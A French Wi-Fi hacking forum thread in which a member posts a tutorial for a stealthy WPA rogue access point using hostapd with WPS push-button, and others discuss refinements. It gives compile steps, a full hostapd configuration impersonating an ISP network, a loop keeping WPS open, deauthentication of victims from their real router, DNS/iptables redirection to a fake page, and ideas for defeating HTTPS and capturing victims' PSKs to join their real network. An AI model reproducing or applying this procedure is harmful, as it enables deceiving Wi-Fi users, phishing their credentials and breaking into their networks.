Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 10-04-2014 18:38:35

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

[Tuto] Rogue AP discrète en full WPA avec hostapd

Bonsoir ! smile


Comme promis précédemment, voici un tuto pour faire un autre type de rogue AP afin de tromper des utilisateurs aguerris.

TOUT D'ABORD je décline toute responsabilité concernant l'utilisation de ce tuto, je ne suis qu'un passionné des réseaux et réseaux sans fil qui s'éclate comme il peut.

Pour faire une rogue AP en WPA on ne vas pas utiliser airbase-ng de la suite aircrack-ng mais un autre utilitaire disponible sous linux se nommant "hostapd" en utilisant le WPS avec la méthode PBC.
Ma config de test:

- Kali linux 1.0.6 tournant avec apache2 et 2 cartes wifi (1 interne de chipset ath9k réservé pour hostapd, 1 alfa-AWUS036H pour downgrader le réseau ciblé).
- Windows 7/64 avec 1 autre alfa-AWUS036H et chrome en navigateur.

Pré-requis:

Une carte de type ath5k ou comme la mienne ath9k
Une seconde carte wifi pour casser la connexion du client a son AP légitime
Un server dhcp
Un serveur web apache pour rediriger la victime sur la fake page
La version de hostapd-2.0


Installation et compilation:

Afin d'éviter des bugs hostapd-2.0 et la meilleur solution car les versions 2.1 et 2.2 ne sont pas assez stable a mon gout.

C'est parti !

Ouvrez un terminal et tapez les commandes suivantes:

wget http://hostap.epitest.fi/releases/hostapd-2.0.tar.gz
tar -xvzf hostapd-2.0.tar.gz

Placez vous dans root puis:

cd /root/hostapd-2.0/hostapd
cp defconfig .config
sudo apt-get install libnl-3-dev libnl-genl-3-dev
sudo apt-get install build-essential
nano .config

Notez le libnl-3 en effet j'ai eu des problème avec la version classique de libnl du coup je suis passé a la 3 et ça ne me pose pas de problème, par contre il y a conflit entre libnl-1 et libnl-3 donc pensez a virer le 1 pour la suite si vous voulez pas avoir des erreur lors de la compilation.

Dans le fichier config pas mal d'options s'offrent a nous et on se rend compte que hostapd est un outil assez puissant en fin de compte.Mais voila les options que vous devez décommenter:

Enlever le # de CONFIG_DRIVER_NL80211=y
Enlever le # de CONFIG_IEEE80211N=y
Enlever le # de CONFIG_IEEE80211AC=y
Enlever le # de CONFIG_DEBUG_FILE=y
Enlever le # de CONFIG_HS20=y
Enlever le # de CONFIG_WPS=y
Enlever le # de CONFIG_WPS2=y
Enlever le # de CONFIG_WPS_UPNP=y

Bon c'est pas tout a fait fini, vous avez pu remarquer qu'il n'y a pas libnl-3 dans les options de compilations, vous devez le rajouter vous meme:

CONFIG_LIBNL32=y

Enregistrez le tout et c'est parti pour la compile:

sudo make
sudo make install
hostapd -v

Si tout va bien après la dernière commande vous verrez ça:

 hostapd -v
hostapd v2.0
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2012, Jouni Malinen <[email protected]> and contributors

Bon et maintenant on s'envoi en l'air ? tongue non pas encore il reste encore la configuration de hostapd a faire.

Pour commencer, créez le fichier hostapd.psk dans /etc et le laisser vide pour que hostapd puisse enregistrer les clients, chemin exact donc /etc/hostapd.psk

Ensuite viens le plus important le fichier de conf, ouvrez hostapd.conf toujours dans le meme répertoire /etc (pensez a faire un backup du fichier original avant de commencer a modifier tout)

# Configure the driver and network interface
driver=nl80211
interface=wlan0
# WPA2-Personal configuration for the AP
ssid=SFR_A340 
wpa=2
wpa_key_mgmt=WPA-PSK
wpa_pairwise=CCMP
# Default WPA passphrase for legacy (non-WPS) clients
wpa_passphrase=12345678
# Enable random per-device PSK generation for WPS clients
# Please note that the file has to exists for hostapd to start (i.e., create an
# empty file as a starting point).
wpa_psk_file=/etc/hostapd.psk
# Set access point hardware mode to 802.11g
hw_mode=g
# ieee a activer pour le wifi N
ieee80211n=1
# wmm for n norme ieee a activer pour le wifi N
wmm_enabled=1
# Set WIFI channel 
channel=6
# adjust to fit your location
country_code=FR
# ieee8021x
ieee8021x=1
# Enable control interface for PBC/PIN entry
ctrl_interface=/var/run/hostapd
# Enable internal EAP server for EAP-WSC (part of Wi-Fi Protected Setup)
eap_server=1
# WPS configuration (AP configured, do not allow external WPS Registrars)
wps_state=2
ap_setup_locked=0
# If UUID is not configured, it will be generated based on local MAC address.
uuid=87654321-9abc-def0-1234-56789abc0000
wps_pin_requests=/var/run/hostapd.pin-req
device_name=Wireless AP
manufacturer=Company
model_name=WAP
model_number=123
serial_number=12345
device_type=6-0050F204-1
os_version=01020300
config_methods=label display push_button keypad
pbc_in_m1=1
# if external Registrars are allowed, UPnP support could be added:
upnp_iface=wlan0
friendly_name=WPS Access Point

En passant ça m'a pris du temps de trouver une config fiable et surtout stable.Maintenant on va passer au préliminaire en créant notre rogue AP avant de s'attaquer au réseau cool

Créez un script bash et rendez le exécutable, voici son contenu:

v7ab.png

Maintenant lancez hostapd:

lifm.png

Ouvrez une autre console et faite la meme avec hostapd_cli, la gestion dynamique de votre point d'accès:

h0zh.png


Maintenant votre AP est ready, reste plus qu'a attirer le client dessus, pour ça on va utiliser mdk3 et airbase-ng avec l'autre carte wifi, (airbase-ng et mdk3 ensemble c'est une tuerie big_smile, je vais expliquer pourquoi utiliser airbase plus bas), ne vous en faite pas il ne s'agit pas de créer et de reconfigurer un autre point d'accès, il y aura juste une commande a rentrer
[IMPORTANT] avant de passer la seconde carte en mode monitor assurez-vous que la carte est down avec "ifconfig $wlanX down" sans quoi vous aurez des erreurs et vous pourrez pas utiliser aircrack, mdk3 etc... il faut bien séparer les choses, wlan0 appartient a hostapd, wlan1 a la suite aircrack-ng et ses outils.

Pour coupez la connexion entre le client et son AP on commencer par mdk3 (ATTENTION: pour éviter l'utilisation de ce tutos par des scripts kiddies mal intentionnés, je ne met pas les commandes que j'utilise vraiment avec mdk3) on part donc sur une commande classique, mais partons plutot du principe que vous savez ce que vous faites avec mdk3:

p291.png

Avec d'autres commande, le client perdrait la connexion a son AP en très peu de temps, ça tombe bien c'est ce qu'on veut mais c'est pas fini, lançons maintenant airbase-ng en reprenant les paramètres du point d'accès du client:

dncc.png

Que vas faire cette commande et bien c'est tout simplement une aide couplé a mdk3 pour pertuber l'AP légitime du client, mais si il y avait que ça vous me diriez "oui mais on peut le faire avec mdk3" et c'est la que j'interviens en vous disant que mdk3 est incapable de faire apparaitre une croix rouge dans le gestionnaire sans fil de windows.

dv0h.bmp


Notez que en plus de la croix rouge, le réseau passe en dernier plan, et le fake créer par hostapd en premier wink de plus si vous etes dans une zone urbaine a forte concentration de réseaux, le vrai réseau et sa croix rouge ne se verront pas a moins de faire défiler la barre déroulante, mais le fake AP lui conserve sa position, après ça dépend aussi de la distance entre vous et l'AP du client mais en étant proche c'est que du bénef.Du coup ça laisse encore plus de possibilité au client de se connecter au fake qui apparait en première position.Au moment de la connexion la fenetre d'hostapd va se mettre en action:

s5w3.png

Pendant ce temps coté client:

9wr9.bmp

C'est a nous de jouer en laissant le client entrer chez nous en tapant "wps_pbc" dans la fenetre de hostapd_cli:
EDIT: pour laisser activer indéfiniment le wps_pbc sans avoir besoin de le relancer a chaque fois rentrez cette commande:

while : ; do sudo hostapd_cli wps_pbc ; sleep 120 ; done &

h0zh.png

Par la suite on peut voir que le client et bien connecté a notre fake AP:

bf33.png


Maintenant on peut s'envoyer en l'air lol


La suite vous la connaissez, redirection avec iptables (règles iptables déja mises dans le script hostapd.sh) et surtout dnsspoof car je n'ai pas confiance a iptables, donc un outil en plus pour s'assurer de la bonne redirection du client n'est pas a négliger wink


Voila, reste plus qu'a faire en sorte que quand le client aille sur un site https il soit quand meme rediriger sur la fake page en http... ce qui n'est pas le cas quand il utilise sa toolbar pour faire une recherche par exemple (ma redirection actuel ne marche que sur du http).Si quelqu'un peut me filer un coup de main la dessus ça serait sympa, quitte a communiquer en message privé si la personne ne veut pas dévoiler sa technique, dans ce cas la je respecterai son choix et ferai de meme.

Bonne soirée et a vos distrib ! smile

Dernière modification par koala (26-04-2014 16:03:25)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 10-04-2014 19:34:15

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 363

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Merci pour ce super tuto, très intéressant et très abouti smile

Hors Ligne

#3 10-04-2014 20:08:12

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

WoW...
Merci beaucoup c'est super bien expliqué, vraiment excellent...
Pouvoir passer par hotspad est une grande avancée smile

Hors Ligne

#4 10-04-2014 21:29:20

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

kcdtv a écrit :

c'est super bien expliqué

Ouep, j'ai essayé de soigner au plus la chose de façon a rendre cette méthode accessible a tout le monde wink

J'oubli pas les latinos et je ferai la meme sur Lampi quand j'aurais un peu de temps smile

Hors Ligne

#5 15-04-2014 18:07:59

Anthonyy59
Membre V.I.P.
Inscription : 03-09-2012
Messages : 277

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Super tuto koala, je pense qu'il en aidera plus d'un wink
Merci à toi !

Hors Ligne

#6 15-04-2014 20:11:10

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Joli tuto merci smile

Dernière modification par Fuji (15-04-2014 20:11:49)

Hors Ligne

#7 15-04-2014 21:15:33

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Salut Koala, très beau boulot ! Un bon tuto clair, complet et détaillé (et je sais de quoi je parle), on voit que tu as bien préparé le sujet !

J'ai bien aimé la partie aibase-ng + mdk3 (j'avais jamais vu cette croix dans la liste des réseaux), c'est astucieux et bien vu smile

Pour Hostapd, j'ai souvent voulu le mettre en œuvre, mais j'étais toujours bloqué par la partie du mot de passe WPA : on doit en spécifier un à la création du serveur, sans connaître le "vrai" de la victime. Donc impossible de laisser la victime se connecter (vu qu'elle ne connaîtra pas le bon mot de passe). J'avais pas pensé à exploiter le WPS, et en particulier le PBC, c'est très intéressant comme approche !

Maintenant j'ai 2-3 questions :
- qu'est-ce qui se passe au moment où le client se connecte ? Il voit la fenêtre de mot de passe, et celle-ci disparaît quand on tape wps_pbc ?
- qu'est-ce qui se passe si la victime tape un mot de passe (qu'il soit le bon ou pas) ?

L'idéal pour limiter au maximum la friction, serait de masquer complètement cette fenêtre (pour qu'il croie être sur le réseau original, dont le mot de passe est censé être mémorisé). Peut-être taper anticipativement wps_pbc avant que le client se connecte ? D'après la doc Hostapd, on a droit à un délai de connexion de 2 minutes à partir du moment où la commande est tapée, peut-être que ça permet la connexion rapide du client. Évidemment, il serait encore mieux de "relancer" le PBC toutes les 2 minutes, mais là je ne sais pas trop comment on pourrait scripter ça (mais peut-être que toi tu sais, tu connais mieux le bouzin que moi) wink Si ça se trouve, un bête pipe echo "wps_pbc" | hostapd_cli; sleep 120 ferait l'affaire...

Autre question, est-ce qu'on pourrait, d'une façon ou d'une autre, récupérer la clé que la victime tape dans la boîte de dialogue ? Y a quand même de fortes chances que ce soit le bon mot de passe du réseau original (ça sert toujours)...
Scénario possible :
- la victime reçoit cette fenêtre où elle doit taper le mot de passe
- hostapd reçoit ce mot de passe (qui n'est pas le bon, pour lui) et le stocke quelque part
- on balance le wps_pbc pour que la connexion soit autorisée quand même (en espérant qu'hostapd ne bannisse pas le client à cause de sa mauvaise tentative)
Ca implique de (1) pouvoir récupérer le mot de passe tapé par la victime et (2) pouvoir détecter un essai (même infructueux) pour pouvoir enchaîne directement avec un wps_pbc derrière.

Y a du challenge, mais les pistes sont prometteuses ! Dommage que je n'aie pas trop le temps de creuser ça pour l'instant...

Un grand merci pour le tuto en tout cas smile

PS : j'ai eu ton commentaire sur HSTS, je te réponds à ce propos très prochainement !

Hors Ligne

#8 16-04-2014 19:17:22

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Content de voir que tu t'intéresses a la chose smile

On va commencer dans l'ordre;

Antares145 a écrit :

- qu'est-ce qui se passe au moment où le client se connecte ? Il voit la fenêtre de mot de passe, et celle-ci disparaît quand on tape wps_pbc ?

C'est exactement ça wink

Antares145 a écrit :

qu'est-ce qui se passe si la victime tape un mot de passe (qu'il soit le bon ou pas) ?

Si on lance pas wps_pbc avec hostapd et qu'on rentre un faux mot de passe on se fait jeter mais j'ai bien essayer de regarder dans les log et de les changer pour essayer de retrouver ce mot de passe rentrer par le client mais je n'ai rien trouver hmm voici les options des logs en question:

# Module bitfield (ORed bitfield of modules that will be logged; -1 = all
# modules):
# bit 0 (1) = IEEE 802.11
# bit 1 (2) = IEEE 802.1X
# bit 2 (4) = RADIUS
# bit 3 (8) = WPA
# bit 4 (16) = driver interface
# bit 5 (32) = IAPP
# bit 6 (64) = MLME
#
# Levels (minimum value for logged events):
#  0 = verbose debugging
#  1 = debugging
#  2 = informational messages
#  3 = notification
#  4 = warning
#
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
Antares145 a écrit :

Peut-être taper anticipativement wps_pbc avant que le client se connecte ? D'après la doc Hostapd, on a droit à un délai de connexion de 2 minutes à partir du moment où la commande est tapée, peut-être que ça permet la connexion rapide du client.

Of course my friend ! si on se débrouille pour avoir activé le PBC avant que le client se connecte la fenetre apparait un court instant seulement et le client n'a pas le temps de réagir et se connecte rapidement big_smile

Antares145 a écrit :

Si ça se trouve, un bête pipe echo "wps_pbc" | hostapd_cli; sleep 120 ferait l'affaire

Oui, faudra que je me penche la dessus.Ou alors pourquoi pas tenter de modifier ce delai en le rendant plus long dans le fichier concerné ?


Antares145 a écrit :

Autre question, est-ce qu'on pourrait, d'une façon ou d'une autre, récupérer la clé que la victime tape dans la boîte de dialogue ? Y a quand même de fortes chances que ce soit le bon mot de passe du réseau original (ça sert toujours)...
Scénario possible :
- la victime reçoit cette fenêtre où elle doit taper le mot de passe
- hostapd reçoit ce mot de passe (qui n'est pas le bon, pour lui) et le stocke quelque part
- on balance le wps_pbc pour que la connexion soit autorisée quand même (en espérant qu'hostapd ne bannisse pas le client à cause de sa mauvaise tentative)
Ca implique de (1) pouvoir récupérer le mot de passe tapé par la victime et (2) pouvoir détecter un essai (même infructueux) pour pouvoir enchaîne directement avec un wps_pbc derrière.


La on rentre dans le vif du sujet et c'est ce sur quoi je bosse depuis longtemps et je vois que t'a pas mis longtemps non plus a comprendre l'intéret que pourrait susciter hostapd si on arrive a faire les choses comme il faut tongue

1- j'ai essayer de retrouver la clé dans la boite de dialogue et je ne l'ai pas trouver hmm

Par contre quand on regarde de plus près on s'aperçoit que le fichier hostapd.psk contient l'adresse MAC du client et de sa PSK, c'est pareil sous windows dans les réseaux enregistrés, la clé n'est pas celle que l'on connait mais la PSK.Conclusion: la PSK est enregistrée quand la connexion est réussi, il faudrait modifier le code source d'hostapd en sens inverse de façon a ce que la clé rentrer par le client nous renvoi sa psk et ce dans le meme fichier(ou directement la clé rentrer par le client mais je pense que ça demanderai plus de travail niveau code tout ça meme si la fin se résume en echec puisque le client ne connait pas la clé.Ca doit etre surement possible avec de bonne connaissance en C, si quelqu'un pouvait se pencher la dessus... roll

Autre chose, qui concerne le dernier paragraphe mais également la tentative reconnexion automatique du client au fake AP lorsqu'on prend le meme BSSID ESSID CH ENCR AUTH et norme wifi que le vrai réseau et qu'on plombe de deauth ce dernier, on s'aperçoit que le client cherche a se connecter tout seul au fake:

wlan0: STA 00:c0:ca:75:88:87 IEEE 802.11: associated (aid 1)
WPA: wpa_sm_step() called recursively

Ces messages sont exactement les meme que lorsque la victime tente de se connecter en rentrant une clé invalide.Donc en arrivant a résoudre le contournement de ce satané message "WPA: wpa_sm_step() called recursively" via une modification du code d'hostapd on arrivera probablement a récupérer la clé que le client rentrer dans la fenetre de connexion puis faire en sorte que hostapd ne détecte pas d'essai infructueux et on pourrait peut-etre envisager une reconnexion automatique d'un AP WPA a un autre AP en WPA ce qui serait un vielle exploit que je n'ai jamais su reproduire une deuxième fois... (la première fois fut entre 2 pc linux un attaquant sous unbutu 9.10 et un client sous linux mint 12 et 2 livebox 2 de sagem voir -> Projet rogue AP/WPS a la première page).


Voila, j'espère t'avoir répondu correctement cool

Ps: j'oubliai, si on active pas le wps_pbc avant que le client se connecte, on a le choix entre activer le pbc quand il se connecte et dans ce cas le client viens a nous comme dans le tuto, ou second choix: le laisser appuyer sur le bouton de son propre routeur car il sera plus pratique pour lui de d'appuyer sur son bouton plutot que taper sa propre clé et la... big_smile

Dernière modification par koala (16-04-2014 19:24:35)

Hors Ligne

#9 17-04-2014 15:26:05

InconnuX
Membre
Inscription : 17-03-2014
Messages : 21

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Super ton tuto, il faut que je trouve du matos pour tester smile

Voila, reste plus qu'a faire en sorte que quand le client aille sur un site https il soit quand meme rediriger sur la fake page en http... ce qui n'est pas le cas quand il utilise sa toolbar pour faire une recherche par exemple (ma redirection actuel ne marche que sur du http).Si quelqu'un peut me filer un coup de main la dessus ça serait sympa, quitte a communiquer en message privé si la personne ne veut pas dévoiler sa technique, dans ce cas la je respecterai son choix et ferai de meme.

Il faut créer un certificat pour Apache et activer le module SSL. De cette manière la redirection https pourra aller sur ton serveur. Le problème avec cette méthode, c'est que le browser indiquera que le certificat est "louche" (car il sera signé par toi-même) et demandera à l'utilisateur si il veut faire une exception ou pas... Donc ce n'est pas transparent.
Le mieux est sûrement de laisser passer le https sur internet et de rediriger uniquement le http sur la fakepage.

Autre question, est-ce qu'on pourrait, d'une façon ou d'une autre, récupérer la clé que la victime tape dans la boîte de dialogue ?

J'avoue ne pas te comprendre antares145 tongue
Car en lisant le forum, j'étais tombé sur une de tes réponses http://www.crack-wifi.com/forum/topic-6 … tml#p43032 qui disait bien "Le WPA se base sur ce qu'on appelle un schéma challenge-réponse, qui fait que le mot de passe ne circule jamais en tant que tel sur le réseau."
Donc c'est impossible de récupérer le mot de passe taper par le client.

Hors Ligne

#10 17-04-2014 16:10:06

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

InconnuX a écrit :

l faut créer un certificat pour Apache et activer le module SSL. De cette manière la redirection https pourra aller sur ton serveur. Le problème avec cette méthode, c'est que le browser indiquera que le certificat est "louche" (car il sera signé par toi-même) et demandera à l'utilisateur si il veut faire une exception ou pas... Donc ce n'est pas transparent.

Justement c'est ce que je cherche a éviter (j'ai déja le SSL sur apache) et en redirection https je me prends un jolie "HSTS failure" avec google chrome sur les gros sites.

Sinon par rapport au poste d'Antares que tu as cité, en utilisant hostapd on a accès a toute sa configuration et son code source, ce qui n'est pas le cas avec une box classique a moins peut-etre de changer des truc dans le firmware mais c'est bien protéger maintenant.

Dernière modification par koala (17-04-2014 16:14:35)

Hors Ligne

#11 20-04-2014 12:07:47

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

koala a écrit :

Sinon par rapport au poste d'Antares que tu as cité, en utilisant hostapd on a accès a toute sa configuration et son code source, ce qui n'est pas le cas avec une box classique a moins peut-etre de changer des truc dans le firmware mais c'est bien protéger maintenant.

En fait c'est une excellente remarque d'InconnuX : le WPA reste du WPA, et c'est la seule chose que le client connait. S'il doit se connecter sur un réseau protégé, il attendra le challenge proposé par l'AP et y répondra avec sa réponse chiffrée (PBKDF2 rulez !). Hostapd fonctionne comme ça puisque c'est le standard WPA, et c'est la seule façon de réaliser un handshake. Même si on modifiait le code d'hostapd (quitte à casser la compatibilité WPA), au mieux on ne récupèrerait quand même que la PMK, au pire on empêcherait la connexion du client.
Cfr ce PDF de Sid (notamment la page 6) --> [url=Packin' the PMK Of the robustness of WPA/WPA2 authentication [sid.rstack.org]]http://sid.rstack.org/pres/0810_BACon_WPA2_en.pdf[/url]
Donc je me suis sans doute emballé trop vite, en pensant au WPS j'ai espéré que le mécanisme serait plus "light" mais en fait ça ne change rien smile C'est l'interface standard de Windows, donc pas grand chose à en tirer...

Par contre :

koala a écrit :

quand on regarde de plus près on s'aperçoit que le fichier hostapd.psk contient l'adresse MAC du client et de sa PSK, c'est pareil sous windows dans les réseaux enregistrés, la clé n'est pas celle que l'on connait mais la PSK.

Là c'est intéressant, parce que la PSK est suffisante pour se connecter au réseau (le vrai !), de la même façon qu'une PSK "récupérée" avec Nirsoft WKV permet de se connecter. A condition que la clé d'origine soit la bonne évidemment, mais si la victime se connecte sur "son réseau", il y a des chances qu'elle utilise le "vrai" mot de passe. A voir si c'est vraiment le cas et que cette PSK récupérée par Hostapd permet effectivement de se connecter. Tu pourrais nous copier-coller le contenu d'un fichier hostapd.psk pour vérifier le format ?

Bon, on ne connaitra toujours pas le mot de passe d'origine (la clé "humainement lisible"), mais c'est mieux que rien. A noter que le passage clé humaine <-> PSK est calculé localement (sur le PC client) et n'est pas réversible.

koala a écrit :

Donc en arrivant a résoudre le contournement de ce satané message "WPA: wpa_sm_step() called recursively" via une modification du code d'hostapd on arrivera probablement a récupérer la clé que le client rentrer dans la fenetre de connexion puis faire en sorte que hostapd ne détecte pas d'essai infructueux et on pourrait peut-etre envisager une reconnexion automatique d'un AP WPA a un autre AP en WPA

Plus exactement, il suffirait (haha !) de modifier le code d'Hostapd pour déclencher un WPS_PBC dès qu'il reçoit une tentative de connexion. Comme ça, bonne clé ou pas, le client se retrouve sur le réseau dès qu'il a tapé un mot de passe. Il faudrait d'abord vérifier qu'un mauvais mot de passe ne compromet pas la connection PBC (mais là aussi, ça doit être modifiable dans le code-source) wink

Hors Ligne

#12 21-04-2014 14:49:05

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : [Tuto] Rogue AP discrète en full WPA avec hostapd

Antares145 a écrit :

Là c'est intéressant, parce que la PSK est suffisante pour se connecter au réseau (le vrai !), de la même façon qu'une PSK "récupérée" avec Nirsoft WKV permet de se connecter. A condition que la clé d'origine soit la bonne évidemment, mais si la victime se connecte sur "son réseau", il y a des chances qu'elle utilise le "vrai" mot de passe. A voir si c'est vraiment le cas et que cette PSK récupérée par Hostapd permet effectivement de se connecter. Tu pourrais nous copier-coller le contenu d'un fichier hostapd.psk pour vérifier le format ?

Le contenu du fichier hostapd.psk, chaque ligne est une connexion sans que le client ne connaisse la clé c'est moi qui l'ai accepter en faisant un wps_pbc:

00:c0:ca:75:88:87 d9915dc64d03f0ad06ded724610ec23aa3885118ec2abf3b6239eed7f5809ad0
00:c0:ca:75:88:87 dfe65cb81e8abe64f154ecdc3a1b89b4d8f9363b7ed6fe74e1f08f6b3683769b
00:c0:ca:75:88:87 037c15c8fc70e5cc57d48e879772e823f28dade25cc653575fa5e05f2881f427
00:c0:ca:75:88:87 51dd8657e725f43f6a15a1215da1fac690da80a909658ce2034b6e6f426e9c03
00:c0:ca:75:88:87 48b5d13fb30ad21a7383d8e3be477c95de863b69de47419e355884bb2dd9f13c
00:c0:ca:75:88:87 eead7404cd1f3b5c0887a3eb335c0ae46c9bece7b7220f7e6947d1cd4c73cd43
00:c0:ca:75:88:87 097d3ca8b1f9ae002959e3bd4bb1ae87175a8e8cdd9e8e3199d955facfdd1271
Antares145 a écrit :

Plus exactement, il suffirait (haha !) de modifier le code d'Hostapd pour déclencher un WPS_PBC dès qu'il reçoit une tentative de connexion. Comme ça, bonne clé ou pas, le client se retrouve sur le réseau dès qu'il a tapé un mot de passe. Il faudrait d'abord vérifier qu'un mauvais mot de passe ne compromet pas la connection PBC (mais là aussi, ça doit être modifiable dans le code-source)

Faut que je me penche la dessus plus en détail mais je crois avoir trouver le fichier gérant ça (wps_defs.h):

/*
 * Wi-Fi Protected Setup - message definitions
 * Copyright (c) 2008, Jouni Malinen <[email protected]>
 *
 * This software may be distributed under the terms of the BSD license.
 * See README for more details.
 */

#ifndef WPS_DEFS_H
#define WPS_DEFS_H

#ifdef CONFIG_WPS_TESTING

extern int wps_version_number;
extern int wps_testing_dummy_cred;
#define WPS_VERSION wps_version_number

#else /* CONFIG_WPS_TESTING */

#ifdef CONFIG_WPS2
#define WPS_VERSION 0x20
#else /* CONFIG_WPS2 */
#define WPS_VERSION 0x10
#endif /* CONFIG_WPS2 */

#endif /* CONFIG_WPS_TESTING */

/* Diffie-Hellman 1536-bit MODP Group; RFC 3526, Group 5 */
#define WPS_DH_GROUP 5

#define WPS_UUID_LEN 16
#define WPS_NONCE_LEN 16
#define WPS_AUTHENTICATOR_LEN 8
#define WPS_AUTHKEY_LEN 32
#define WPS_KEYWRAPKEY_LEN 16
#define WPS_EMSK_LEN 32
#define WPS_PSK_LEN 16
#define WPS_SECRET_NONCE_LEN 16
#define WPS_HASH_LEN 32
#define WPS_KWA_LEN 8
#define WPS_MGMTAUTHKEY_LEN 32
#define WPS_MGMTENCKEY_LEN 16
#define WPS_MGMT_KEY_ID_LEN 16
#define WPS_OOB_DEVICE_PASSWORD_MIN_LEN 16
#define WPS_OOB_DEVICE_PASSWORD_LEN 32
#define WPS_OOB_PUBKEY_HASH_LEN 20

/* Attribute Types */
enum wps_attribute {
	ATTR_AP_CHANNEL = 0x1001,
	ATTR_ASSOC_STATE = 0x1002,
	ATTR_AUTH_TYPE = 0x1003,
	ATTR_AUTH_TYPE_FLAGS = 0x1004,
	ATTR_AUTHENTICATOR = 0x1005,
	ATTR_CONFIG_METHODS = 0x1008,
	ATTR_CONFIG_ERROR = 0x1009,
	ATTR_CONFIRM_URL4 = 0x100a,
	ATTR_CONFIRM_URL6 = 0x100b,
	ATTR_CONN_TYPE = 0x100c,
	ATTR_CONN_TYPE_FLAGS = 0x100d,
	ATTR_CRED = 0x100e,
	ATTR_ENCR_TYPE = 0x100f,
	ATTR_ENCR_TYPE_FLAGS = 0x1010,
	ATTR_DEV_NAME = 0x1011,
	ATTR_DEV_PASSWORD_ID = 0x1012,
	ATTR_E_HASH1 = 0x1014,
	ATTR_E_HASH2 = 0x1015,
	ATTR_E_SNONCE1 = 0x1016,
	ATTR_E_SNONCE2 = 0x1017,
	ATTR_ENCR_SETTINGS = 0x1018,
	ATTR_ENROLLEE_NONCE = 0x101a,
	ATTR_FEATURE_ID = 0x101b,
	ATTR_IDENTITY = 0x101c,
	ATTR_IDENTITY_PROOF = 0x101d,
	ATTR_KEY_WRAP_AUTH = 0x101e,
	ATTR_KEY_ID = 0x101f,
	ATTR_MAC_ADDR = 0x1020,
	ATTR_MANUFACTURER = 0x1021,
	ATTR_MSG_TYPE = 0x1022,
	ATTR_MODEL_NAME = 0x1023,
	ATTR_MODEL_NUMBER = 0x1024,
	ATTR_NETWORK_INDEX = 0x1026,
	ATTR_NETWORK_KEY = 0x1027,
	ATTR_NETWORK_KEY_INDEX = 0x1028,
	ATTR_NEW_DEVICE_NAME = 0x1029,
	ATTR_NEW_PASSWORD = 0x102a,
	ATTR_OOB_DEVICE_PASSWORD = 0x102c,
	ATTR_OS_VERSION = 0x102d,
	ATTR_POWER_LEVEL = 0x102f,
	ATTR_PSK_CURRENT = 0x1030,
	ATTR_PSK_MAX = 0x1031,
	ATTR_PUBLIC_KEY = 0x1032,
	ATTR_RADIO_ENABLE = 0x1033,
	ATTR_REBOOT = 0x1034,
	ATTR_REGISTRAR_CURRENT = 0x1035,
	ATTR_REGISTRAR_ESTABLISHED = 0x1036,
	ATTR_REGISTRAR_LIST = 0x1037,
	ATTR_REGISTRAR_MAX = 0x1038,
	ATTR_REGISTRAR_NONCE = 0x1039,
	ATTR_REQUEST_TYPE = 0x103a,
	ATTR_RESPONSE_TYPE = 0x103b,
	ATTR_RF_BANDS = 0x103c,
	ATTR_R_HASH1 = 0x103d,
	ATTR_R_HASH2 = 0x103e,
	ATTR_R_SNONCE1 = 0x103f,
	ATTR_R_SNONCE2 = 0x1040,
	ATTR_SELECTED_REGISTRAR = 0x1041,
	ATTR_SERIAL_NUMBER = 0x1042,
	ATTR_WPS_STATE = 0x1044,
	ATTR_SSID = 0x1045,
	ATTR_TOTAL_NETWORKS = 0x1046,
	ATTR_UUID_E = 0x1047,
	ATTR_UUID_R = 0x1048,
	ATTR_VENDOR_EXT = 0x1049,
	ATTR_VERSION = 0x104a,
	ATTR_X509_CERT_REQ = 0x104b,
	ATTR_X509_CERT = 0x104c,
	ATTR_EAP_IDENTITY = 0x104d,
	ATTR_MSG_COUNTER = 0x104e,
	ATTR_PUBKEY_HASH = 0x104f,
	ATTR_REKEY_KEY = 0x1050,
	ATTR_KEY_LIFETIME = 0x1051,
	ATTR_PERMITTED_CFG_METHODS = 0x1052,
	ATTR_SELECTED_REGISTRAR_CONFIG_METHODS = 0x1053,
	ATTR_PRIMARY_DEV_TYPE = 0x1054,
	ATTR_SECONDARY_DEV_TYPE_LIST = 0x1055,
	ATTR_PORTABLE_DEV = 0x1056,
	ATTR_AP_SETUP_LOCKED = 0x1057,
	ATTR_APPLICATION_EXT = 0x1058,
	ATTR_EAP_TYPE = 0x1059,
	ATTR_IV = 0x1060,
	ATTR_KEY_PROVIDED_AUTO = 0x1061,
